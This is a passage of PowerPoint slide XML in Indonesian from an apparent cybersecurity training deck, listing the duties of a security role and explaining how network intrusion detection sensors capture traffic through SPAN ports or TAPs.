              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manusia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (SDM). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kegiatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tipikal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Berpartisipasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penilaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rekomendasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memasang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengonfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mengatur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memelihara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dokumen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>profil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istimewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Memantau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> log audit, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meninjau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istimewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dokumen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>respons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaporan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>insiden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menguji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prosedur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keberlangsungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Berpartisipasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> program </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelatihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pendidikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</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11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21606262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Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Deteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Intrusi</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>intrusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nyata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> log </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Sensor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>intrusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menangkap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelacak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sensor. Sensor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port SPAN/mirror </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TAP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebaris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, sensor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penangkap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditempatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>belakang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dekat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Idenya </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>trafik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbahaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berhasil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melewati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> firewall. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sniffer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tunggal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merekam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sejumlah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>trafik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menempatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sensor di mana-mana di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelolanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
